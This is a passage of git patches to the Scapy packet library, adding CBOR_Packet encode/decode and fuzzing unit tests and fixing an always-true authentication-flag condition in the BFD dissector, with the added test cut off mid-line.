CBORF_BYTE_STRING('body', b''), + CBORF_PACKET('metadata', None, DocMeta2), + ) + +meta = DocMeta2() +meta.creator.val = 'bob' +meta.version.val = 7 +doc = DocPacket2() +doc.title.val = 'Report' +doc.body.val = b'\x01\x02\x03' +doc.metadata = meta +raw = bytes(doc) +doc2 = DocPacket2(raw) +doc2.title.val == 'Report' and doc2.body.val == b'\x01\x02\x03' and doc2.metadata.creator.val == 'bob' and doc2.metadata.version.val == 7 + ++ CBOR_Packet - CBORF_ARRAY_OF with CBOR_Packet elements + += CBORF_ARRAY_OF with CBOR_Packet class: cbor2 list of lists → Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_ARRAY_OF +from scapy.cborpacket import CBOR_Packet + +class StatusItem(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('code', 0), + CBORF_TEXT_STRING('msg', ''), + ) + +class StatusList(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('statuses', [], StatusItem) + +raw = cbor2.dumps([[200, 'OK'], [201, 'Created'], [204, 'No Content']]) +pkt = StatusList(raw) +len(pkt.statuses) == 3 and pkt.statuses[0].code.val == 200 and pkt.statuses[1].msg.val == 'Created' and pkt.statuses[2].code.val == 204 + += CBORF_ARRAY_OF with CBOR_Packet class: Scapy encode → cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_ARRAY_OF +from scapy.cborpacket import CBOR_Packet + +class ErrItem(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('code', 0), + CBORF_TEXT_STRING('msg', ''), + ) + +class ErrList(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('errors', [], ErrItem) + +pkt = ErrList() +pkt.errors = [ErrItem(cbor2.dumps([404, 'Not Found'])), ErrItem(cbor2.dumps([500, 'Server Error']))] +dec = cbor2.loads(bytes(pkt)) +dec == [[404, 'Not Found'], [500, 'Server Error']] + += CBORF_ARRAY_OF with CBOR_Packet class: roundtrip +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_ARRAY_OF +from scapy.cborpacket import CBOR_Packet + +class MsgItem(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('id', 0), + CBORF_TEXT_STRING('txt', ''), + ) + +class MsgList(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('messages', [], MsgItem) + +raw = cbor2.dumps([[1, 'hello'], [2, 'world'], [3, 'foo']]) +pkt = MsgList(raw) +raw2 = bytes(pkt) +pkt2 = MsgList(raw2) +len(pkt2.messages) == 3 and pkt2.messages[2].id.val == 3 and pkt2.messages[2].txt.val == 'foo' + += CBORF_ARRAY_OF with CBOR_Packet class: empty list +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_ARRAY_OF +from scapy.cborpacket import CBOR_Packet + +class EmptyItem(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('val', 0), + ) + +class EmptyItemList(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], EmptyItem) + +pkt = EmptyItemList() +raw = bytes(pkt) +dec = cbor2.loads(raw) +dec == [] and len(EmptyItemList(raw).items) == 0 + += CBORF_ARRAY_OF with CBOR_Packet class inside CBORF_MAP +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_ARRAY_OF, CBORF_MAP, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class EventItem(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_TEXT_STRING('evt', ''), + CBORF_INTEGER('ts', 0), + ) + +class EventLog(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('events', [], EventItem) + +class Report(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('source', ''), + CBORF_INTEGER('count', 0), + CBORF_PACKET('log', None, EventLog), + ) + +log = EventLog() +log.events = [EventItem(cbor2.dumps(['boot', 1000])), EventItem(cbor2.dumps(['login', 2000]))] +rpt = Report() +rpt.source.val = 'sensor-1' +rpt.count.val = 2 +rpt.log = log +raw = bytes(rpt) +dec = cbor2.loads(raw) +dec.get('source') == 'sensor-1' and dec.get('count') == 2 and dec.get('log') == [['boot', 1000], ['login', 2000]] + ++ CBOR_Packet - CBORF_optional extended tests + += CBORF_optional: type mismatch in CBORF_ARRAY sets field to None +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_optional +from scapy.cborpacket import CBOR_Packet + +class TwoFieldPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('version', 0), + CBORF_optional(CBORF_TEXT_STRING('description', 'none')), + ) + +raw = cbor2.dumps([7, 99]) +pkt = TwoFieldPkt(raw) +pkt.version.val == 7 and pkt.description is None + += CBORF_optional: correct type present is decoded normally +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_optional +from scapy.cborpacket import CBOR_Packet + +class OptPresentPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('version', 0), + CBORF_optional(CBORF_TEXT_STRING('description', '')), + ) + +raw = cbor2.dumps([3, 'hello world']) +pkt = OptPresentPkt(raw) +pkt.version.val == 3 and pkt.description.val == 'hello world' + += CBORF_optional: encode and decode roundtrip with present field +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_optional +from scapy.cborpacket import CBOR_Packet + +class OptRTPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('version', 1), + CBORF_optional(CBORF_TEXT_STRING('title', '')), + ) + +pkt = OptRTPkt() +pkt.title.val = 'test title' +raw = bytes(pkt) +pkt2 = OptRTPkt(raw) +pkt2.version.val == 1 and pkt2.title.val == 'test title' + += CBORF_optional: cbor2 interop - optional present +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_optional +from scapy.cborpacket import CBOR_Packet + +class OptInteropPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('seq', 0), + CBORF_optional(CBORF_TEXT_STRING('note', '')), + ) + +pkt = OptInteropPkt() +pkt.note.val = 'cbor2 interop' +dec = cbor2.loads(bytes(pkt)) +dec == [0, 'cbor2 interop'] + += CBORF_optional inside CBORF_MAP: key present in cbor2 dict is decoded +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_optional +from scapy.cborpacket import CBOR_Packet + +class ConfigWithOpt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('timeout', 30), + CBORF_optional(CBORF_TEXT_STRING('endpoint', '')), + CBORF_INTEGER('retries', 3), + ) + +pkt = ConfigWithOpt(cbor2.dumps({'timeout': 60, 'endpoint': 'https://example.com', 'retries': 5})) +pkt.timeout.val == 60 and pkt.endpoint.val == 'https://example.com' and pkt.retries.val == 5 + += CBORF_optional inside CBORF_MAP: missing key stays at default +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_optional +from scapy.cborpacket import CBOR_Packet + +class ConfigNoOpt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('timeout', 30), + CBORF_optional(CBORF_TEXT_STRING('endpoint', '')), + CBORF_INTEGER('retries', 3), + ) + +pkt = ConfigNoOpt(cbor2.dumps({'timeout': 15, 'retries': 2})) +pkt.timeout.val == 15 and pkt.retries.val == 2 + ++ CBOR_Packet - CBORF_SEMANTIC_TAG extended tests + += CBORF_SEMANTIC_TAG with TEXT_STRING inner: Scapy encode, cbor2 decode as datetime +import cbor2, datetime +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_TEXT_STRING, CBORF_SEMANTIC_TAG +from scapy.cborpacket import CBOR_Packet + +class DatetimePkt(CBOR_Packet): + CBOR_root = CBORF_SEMANTIC_TAG('tag', None, 0, CBORF_TEXT_STRING('dt', '')) + +pkt = DatetimePkt() +pkt.dt.val = '2023-01-15T12:00:00Z' +dec = cbor2.loads(bytes(pkt)) +isinstance(dec, datetime.datetime) + += CBORF_SEMANTIC_TAG with INTEGER inner: Scapy encode, cbor2 decode as datetime +import cbor2, datetime +from scapy.cbor.cborfields import CBORF_INTEGER, CBORF_SEMANTIC_TAG +from scapy.cborpacket import CBOR_Packet + +class UnixTimePkt(CBOR_Packet): + CBOR_root = CBORF_SEMANTIC_TAG('tag', None, 1, CBORF_INTEGER('ts', 0)) + +pkt = UnixTimePkt() +pkt.ts.val = 1700000000 +dec = cbor2.loads(bytes(pkt)) +isinstance(dec, datetime.datetime) + += CBORF_SEMANTIC_TAG roundtrip: Scapy encode → Scapy decode preserves inner value +import cbor2 +from scapy.cbor.cborfields import CBORF_INTEGER, CBORF_SEMANTIC_TAG +from scapy.cborpacket import CBOR_Packet + +class TagRTPkt(CBOR_Packet): + CBOR_root = CBORF_SEMANTIC_TAG('tag', None, 1, CBORF_INTEGER('ts', 0)) + +pkt = TagRTPkt() +pkt.ts.val = 1700000000 +raw = bytes(pkt) +pkt2 = TagRTPkt(raw) +pkt2.ts.val == 1700000000 + += CBORF_SEMANTIC_TAG: tag byte matches CBOR major type 6 encoding +import cbor2 +from scapy.cbor.cborfields import CBORF_BYTE_STRING, CBORF_SEMANTIC_TAG +from scapy.cborpacket import CBOR_Packet + +class TagBigNum(CBOR_Packet): + CBOR_root = CBORF_SEMANTIC_TAG('tag', None, 2, CBORF_BYTE_STRING('n', b'')) + +pkt = TagBigNum() +pkt.n.val = b'\x01\x00\x00\x00\x00\x00\x00\x00\x00' +raw = bytes(pkt) +raw[0:1] == b'\xc2' + += CBORF_SEMANTIC_TAG: byte-exact comparison with cbor2 CBORTag +import cbor2 +from scapy.cbor.cborfields import CBORF_INTEGER, CBORF_SEMANTIC_TAG +from scapy.cborpacket import CBOR_Packet + +class TagCmpPkt(CBOR_Packet): + CBOR_root = CBORF_SEMANTIC_TAG('tag', None, 1, CBORF_INTEGER('ts', 0)) + +pkt = TagCmpPkt() +pkt.ts.val = 9999999 +bytes(pkt) == cbor2.dumps(cbor2.CBORTag(1, 9999999)) + += CBORF_SEMANTIC_TAG inside CBORF_MAP: Scapy encode, cbor2 decode +import cbor2, datetime +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_INTEGER, CBORF_SEMANTIC_TAG +from scapy.cborpacket import CBOR_Packet + +class EventPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('event_type', ''), + CBORF_SEMANTIC_TAG('tag', None, 1, CBORF_INTEGER('ts', 0)), + ) + +pkt = EventPkt() +pkt.event_type.val = 'login' +pkt.ts.val = 9999999 +dec = cbor2.loads(bytes(pkt)) +isinstance(dec, dict) and dec.get('event_type') == 'login' and isinstance(dec.get('tag'), datetime.datetime) + += CBORF_SEMANTIC_TAG inside CBORF_MAP: Scapy roundtrip preserves inner value +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_INTEGER, CBORF_SEMANTIC_TAG +from scapy.cborpacket import CBOR_Packet + +class EventRTPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('event_type', ''), + CBORF_SEMANTIC_TAG('tag', None, 1, CBORF_INTEGER('ts', 0)), + ) + +pkt = EventRTPkt() +pkt.event_type.val = 'logout' +pkt.ts.val = 1234567890 +raw = bytes(pkt) +pkt2 = EventRTPkt(raw) +pkt2.event_type.val == 'logout' and pkt2.ts.val == 1234567890 + += CBORF_SEMANTIC_TAG inside CBORF_ARRAY: Scapy encode, cbor2 decode +import cbor2, datetime +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_TEXT_STRING, CBORF_INTEGER, CBORF_SEMANTIC_TAG +from scapy.cborpacket import CBOR_Packet + +class TimedEventArr(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_TEXT_STRING('evt', ''), + CBORF_SEMANTIC_TAG('tag', None, 1, CBORF_INTEGER('ts', 0)), + ) + +pkt = TimedEventArr() +pkt.evt.val = 'start' +pkt.ts.val = 1700000000 +dec = cbor2.loads(bytes(pkt)) +dec[0] == 'start' and isinstance(dec[1], datetime.datetime) + ++ CBOR_Packet - realistic models + += Realistic model: EAT-like attestation token +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class EATToken(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('nonce', 0), + CBORF_TEXT_STRING('ueid', ''), + CBORF_BYTE_STRING('boot_seed', b''), + CBORF_INTEGER('hwver', 0), + ) + +raw = cbor2.dumps({'nonce': 12345, 'ueid': 'device-abc', 'boot_seed': b'\x00' * 16, 'hwver': 3}) +pkt = EATToken(raw) +pkt.nonce.val == 12345 and pkt.ueid.val == 'device-abc' and pkt.boot_seed.val == b'\x00' * 16 and pkt.hwver.val == 3 + += Realistic model: EAT-like token Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class EATToken2(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('nonce', 0), + CBORF_TEXT_STRING('ueid', ''), + CBORF_BYTE_STRING('boot_seed', b''), + CBORF_INTEGER('hwver', 0), + ) + +pkt = EATToken2() +pkt.nonce.val = 99999 +pkt.ueid.val = 'iot-sensor-01' +pkt.boot_seed.val = b'\xde\xad\xbe\xef' * 4 +pkt.hwver.val = 5 +dec = cbor2.loads(bytes(pkt)) +dec.get('nonce') == 99999 and dec.get('ueid') == 'iot-sensor-01' and dec.get('boot_seed') == b'\xde\xad\xbe\xef' * 4 and dec.get('hwver') == 5 + += Realistic model: SensorReport with CBORF_PACKET inner reading +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_FLOAT, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class SensorData(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('sensor_id', 0), + CBORF_FLOAT('temperature', 0.0), + ) + +class SensorReport(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('station', 0), + CBORF_TEXT_STRING('unit', ''), + CBORF_PACKET('reading', None, SensorData), + ) + +reading = SensorData() +reading.sensor_id.val = 3 +reading.temperature.val = 98.6 +rpt = SensorReport() +rpt.station.val = 5 +rpt.unit.val = 'fahrenheit' +rpt.reading = reading +dec = cbor2.loads(bytes(rpt)) +dec.get('station') == 5 and dec.get('unit') == 'fahrenheit' and dec.get('reading') == [3, 98.6] + += Realistic model: SensorReport Scapy roundtrip +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_FLOAT, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class SensorData2(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('sensor_id', 0), + CBORF_FLOAT('temperature', 0.0), + ) + +class SensorReport2(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('station', 0), + CBORF_TEXT_STRING('unit', ''), + CBORF_PACKET('reading', None, SensorData2), + ) + +raw = cbor2.dumps({'station': 9, 'unit': 'celsius', 'reading': [7, 36.5]}) +pkt = SensorReport2(raw) +pkt2 = SensorReport2(bytes(pkt)) +pkt2.station.val == 9 and pkt2.unit.val == 'celsius' and pkt2.reading.sensor_id.val == 7 + += Realistic model: StatusList (CBORF_ARRAY_OF of CBOR_Packets) encode and decode +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_ARRAY_OF +from scapy.cborpacket import CBOR_Packet + +class HttpStatus(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('code', 0), + CBORF_TEXT_STRING('phrase', ''), + ) + +class HttpStatusList(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('statuses', [], HttpStatus) + +raw = cbor2.dumps([[200, 'OK'], [201, 'Created'], [404, 'Not Found']]) +pkt = HttpStatusList(raw) +raw2 = bytes(pkt) +dec = cbor2.loads(raw2) +dec == [[200, 'OK'], [201, 'Created'], [404, 'Not Found']] + += Realistic model: HTTP response header map +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class HttpResponse(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('status', 0), + CBORF_TEXT_STRING('content_type', ''), + CBORF_INTEGER('content_length', 0), + CBORF_BYTE_STRING('body', b''), + ) + +pkt = HttpResponse() +pkt.status.val = 200 +pkt.content_type.val = 'application/cbor' +pkt.content_length.val = 4 +pkt.body.val = b'\x01\x02\x03\x04' +dec = cbor2.loads(bytes(pkt)) +dec.get('status') == 200 and dec.get('content_type') == 'application/cbor' and dec.get('body') == b'\x01\x02\x03\x04' + += Realistic model: HTTP response header cbor2 → Scapy roundtrip +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class HttpResponse2(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('status', 0), + CBORF_TEXT_STRING('content_type', ''), + CBORF_INTEGER('content_length', 0), + CBORF_BYTE_STRING('body', b''), + ) + +raw = cbor2.dumps({'status': 404, 'content_type': 'text/plain', 'content_length': 9, 'body': b'Not Found'}) +pkt = HttpResponse2(raw) +pkt2 = HttpResponse2(bytes(pkt)) +pkt2.status.val == 404 and pkt2.content_type.val == 'text/plain' and pkt2.body.val == b'Not Found' + += Realistic model: COSE-like header map with integer algorithm +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_BYTE_STRING, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class CoseHeader(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('alg', 0), + CBORF_TEXT_STRING('kid', ''), + CBORF_BYTE_STRING('x5t', b''), + ) + +pkt = CoseHeader(cbor2.dumps({'alg': -7, 'kid': 'key-42', 'x5t': b'\xaa\xbb\xcc\xdd'})) +dec = cbor2.loads(bytes(pkt)) +dec.get('alg') == -7 and dec.get('kid') == 'key-42' and dec.get('x5t') == b'\xaa\xbb\xcc\xdd' + += Realistic model: CBOR_Packet fields_desc populated for complex structures +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BYTE_STRING, CBORF_FLOAT +from scapy.cborpacket import CBOR_Packet + +class FullRecord(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('seq', 0), + CBORF_TEXT_STRING('source', ''), + CBORF_FLOAT('score', 0.0), + CBORF_BYTE_STRING('checksum', b''), + ) + +field_names = [f.name for f in FullRecord.fields_desc] +'seq' in field_names and 'source' in field_names and 'score' in field_names and 'checksum' in field_names + += Realistic model: multi-field packet encoding is byte-for-byte reproducible +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BYTE_STRING, CBORF_FLOAT +from scapy.cborpacket import CBOR_Packet + +class MeasurementPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('seq', 0), + CBORF_TEXT_STRING('sensor', ''), + CBORF_FLOAT('value', 0.0), + CBORF_BYTE_STRING('raw', b''), + ) + +pkt = MeasurementPkt() +pkt.seq.val = 42 +pkt.sensor.val = 'temp-01' +pkt.value.val = 23.5 +pkt.raw.val = b'\x01\x02' +raw1 = bytes(pkt) +raw2 = bytes(MeasurementPkt(raw1)) +raw1 == raw2 + +########### CBOR Fuzzing / Random Object Tests #################### + ++ CBOR Random Object Generation + += Create RandCBORObject +from scapy.cbor import RandCBORObject +rand = RandCBORObject() +isinstance(rand, RandCBORObject) + += Generate random CBOR unsigned integer +from scapy.cbor import RandCBORObject, CBOR_UNSIGNED_INTEGER +rand = RandCBORObject(objlist=[CBOR_UNSIGNED_INTEGER]) +obj = rand._fix() +isinstance(obj, CBOR_UNSIGNED_INTEGER) and isinstance(obj.val, int) and obj.val >= 0 + += Generate random CBOR negative integer +from scapy.cbor import RandCBORObject, CBOR_NEGATIVE_INTEGER +rand = RandCBORObject(objlist=[CBOR_NEGATIVE_INTEGER]) +obj = rand._fix() +isinstance(obj, CBOR_NEGATIVE_INTEGER) and isinstance(obj.val, int) and obj.val < 0 + += Generate random CBOR byte string +from scapy.cbor import RandCBORObject, CBOR_BYTE_STRING +rand = RandCBORObject(objlist=[CBOR_BYTE_STRING]) +obj = rand._fix() +isinstance(obj, CBOR_BYTE_STRING) and isinstance(obj.val, bytes) + += Generate random CBOR text string +from scapy.cbor import RandCBORObject, CBOR_TEXT_STRING +rand = RandCBORObject(objlist=[CBOR_TEXT_STRING]) +obj = rand._fix() +isinstance(obj, CBOR_TEXT_STRING) and isinstance(obj.val, str) and len(obj.val) > 0 + += Generate random CBOR array +from scapy.cbor import RandCBORObject, CBOR_ARRAY +rand = RandCBORObject(objlist=[CBOR_ARRAY]) +obj = rand._fix() +isinstance(obj, CBOR_ARRAY) and isinstance(obj.val, list) + += Generate random CBOR map +from scapy.cbor import RandCBORObject, CBOR_MAP +rand = RandCBORObject(objlist=[CBOR_MAP]) +obj = rand._fix() +isinstance(obj, CBOR_MAP) and isinstance(obj.val, dict) + += Generate random CBOR boolean (false) +from scapy.cbor import RandCBORObject, CBOR_FALSE +rand = RandCBORObject(objlist=[CBOR_FALSE]) +obj = rand._fix() +isinstance(obj, CBOR_FALSE) and obj.val == False + += Generate random CBOR boolean (true) +from scapy.cbor import RandCBORObject, CBOR_TRUE +rand = RandCBORObject(objlist=[CBOR_TRUE]) +obj = rand._fix() +isinstance(obj, CBOR_TRUE) and obj.val == True + += Generate random CBOR null +from scapy.cbor import RandCBORObject, CBOR_NULL +rand = RandCBORObject(objlist=[CBOR_NULL]) +obj = rand._fix() +isinstance(obj, CBOR_NULL) and obj.val is None + += Generate random CBOR undefined +from scapy.cbor import RandCBORObject, CBOR_UNDEFINED +rand = RandCBORObject(objlist=[CBOR_UNDEFINED]) +obj = rand._fix() +isinstance(obj, CBOR_UNDEFINED) and obj.val is None + += Generate random CBOR float +from scapy.cbor import RandCBORObject, CBOR_FLOAT +rand = RandCBORObject(objlist=[CBOR_FLOAT]) +obj = rand._fix() +isinstance(obj, CBOR_FLOAT) and isinstance(obj.val, float) + ++ CBOR Random Object Encoding/Decoding + += Encode and decode random unsigned integer +from scapy.cbor import RandCBORObject, CBOR_UNSIGNED_INTEGER, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_UNSIGNED_INTEGER]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_UNSIGNED_INTEGER) and remainder == b'' and decoded.val == obj.val + += Encode and decode random text string +from scapy.cbor import RandCBORObject, CBOR_TEXT_STRING, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_TEXT_STRING]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_TEXT_STRING) and remainder == b'' and decoded.val == obj.val + += Encode and decode random byte string +from scapy.cbor import RandCBORObject, CBOR_BYTE_STRING, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_BYTE_STRING]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_BYTE_STRING) and remainder == b'' and decoded.val == obj.val + += Encode and decode random array +from scapy.cbor import RandCBORObject, CBOR_ARRAY, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_ARRAY]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_ARRAY) and remainder == b'' and len(decoded.val) == len(obj.val) + += Encode and decode random map +from scapy.cbor import RandCBORObject, CBOR_MAP, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_MAP]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_MAP) and remainder == b'' and len(decoded.val) == len(obj.val) + += Encode and decode random float +from scapy.cbor import RandCBORObject, CBOR_FLOAT, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_FLOAT]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_FLOAT) and remainder == b'' + ++ CBOR Random Mixed Types + += Generate multiple random objects of different types +from scapy.cbor import RandCBORObject +rand = RandCBORObject() +objects = [rand._fix() for _ in range(10)] +len(objects) == 10 and all(hasattr(obj, 'val') for obj in objects) + += Encode and decode multiple random objects +from scapy.cbor import RandCBORObject, CBOR_Codecs +rand = RandCBORObject() +success_count = 0 +for _ in range(20): + obj = rand._fix() + try: + encoded = bytes(obj) + decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) + if remainder == b'': + success_count += 1 + except: + pass + +success_count >= 18 + += Random nested arrays encode/decode correctly +from scapy.cbor import RandCBORObject, CBOR_ARRAY, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_ARRAY]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_ARRAY) and remainder == b'' + += Random nested maps encode/decode correctly +from scapy.cbor import RandCBORObject, CBOR_MAP, CBOR_Codecs +rand = RandCBORObject(objlist=[CBOR_MAP]) +obj = rand._fix() +encoded = bytes(obj) +decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) +isinstance(decoded, CBOR_MAP) and remainder == b'' + ++ CBOR Fuzzing Stress Tests + += Generate 100 random objects without errors +from scapy.cbor import RandCBORObject +rand = RandCBORObject() +objects = [] +for _ in range(100): + obj = None + try: + obj = rand._fix() + except: + pass + if obj is not None: + objects.append(obj) + +len(objects) >= 95 + += Encode 50 random objects without errors +from scapy.cbor import RandCBORObject +rand = RandCBORObject() +encoded_count = 0 +for _ in range(50): + obj = rand._fix() + try: + encoded = bytes(obj) + if len(encoded) > 0: + encoded_count += 1 + except: + pass + +encoded_count >= 45 + += Roundtrip 50 random objects +from scapy.cbor import RandCBORObject, CBOR_Codecs +rand = RandCBORObject() +roundtrip_count = 0 +for _ in range(50): + obj = rand._fix() + try: + encoded = bytes(obj) + decoded, remainder = CBOR_Codecs.CBOR.dec(encoded) + if remainder == b'': + roundtrip_count += 1 + except: + pass + +roundtrip_count >= 45 From 66ef96a9e218f5314a1e645da4eeffddbd47625f Mon Sep 17 00:00:00 2001 From: "Teppei.F" <37261985+T3pp31@users.noreply.github.com> Date: Mon, 13 Apr 2026 03:15:19 +0900 Subject: [PATCH 1622/1632] bfd: fix ConditionalField condition for optional_auth always being True (#4937) (#4965) The condition `pkt.flags.names[2] == "A"` always evaluated to True because FlagValue.names returns the flag definition string "MDACFP", not the set of currently active flags. Replace with `pkt.flags.A` to properly check the Authentication Present bit. --- scapy/contrib/bfd.py | 2 +- test/contrib/bfd.uts | 32 +++++++++++++++++++++++++++++++- 2 files changed, 32 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/bfd.py b/scapy/contrib/bfd.py index a06a80bd9c2..1c694d28dcf 100644 --- a/scapy/contrib/bfd.py +++ b/scapy/contrib/bfd.py @@ -131,7 +131,7 @@ class BFD(Packet): BitField("echo_rx_interval", 1000000000, 32), ConditionalField( PacketField("optional_auth", None, OptionalAuth), - lambda pkt: pkt.flags.names[2] == "A", + lambda pkt: pkt.flags.A, ), ] diff --git a/test/contrib/bfd.uts b/test/contrib/bfd.uts index 7de9dd30681..39a467b115a 100644 --- a/test/contrib/bfd.uts +++ b/test/contrib/bfd.uts @@ -44,4 +44,34 @@ assert raw(p) == b'\x0e\xc8\x0e\xc8\x008\x00\x00 \xc4\x030\x11\x11\x11\x11"""";\ = BFD with OptionalAuth [Meticulous Keyed SHA1 Auth] [Build] p = UDP(sport=3784, dport=3784)/BFD(flags="A", optional_auth=OptionalAuth(auth_type=5)) -assert raw(p) == b'\x0e\xc8\x0e\xc8\x00<\x00\x00 \xc4\x034\x11\x11\x11\x11"""";\x9a\xca\x00;\x9a\xca\x00;\x9a\xca\x00\x05\x1c\x01\x00\x00\x00\x00\x00[\xaaa\xe4\xc9\xb9??\x06\x82%\x0bl\xf83\x1b~\xe6\x8f\xd8' \ No newline at end of file +assert raw(p) == b'\x0e\xc8\x0e\xc8\x00<\x00\x00 \xc4\x034\x11\x11\x11\x11"""";\x9a\xca\x00;\x9a\xca\x00;\x9a\xca\x00\x05\x1c\x01\x00\x00\x00\x00\x00[\xaaa\xe4\xc9\xb9??\x06\x82%\x0bl\xf83\x1b~\xe6\x8f\xd8' + += BFD without Auth flag - dissection should not inject 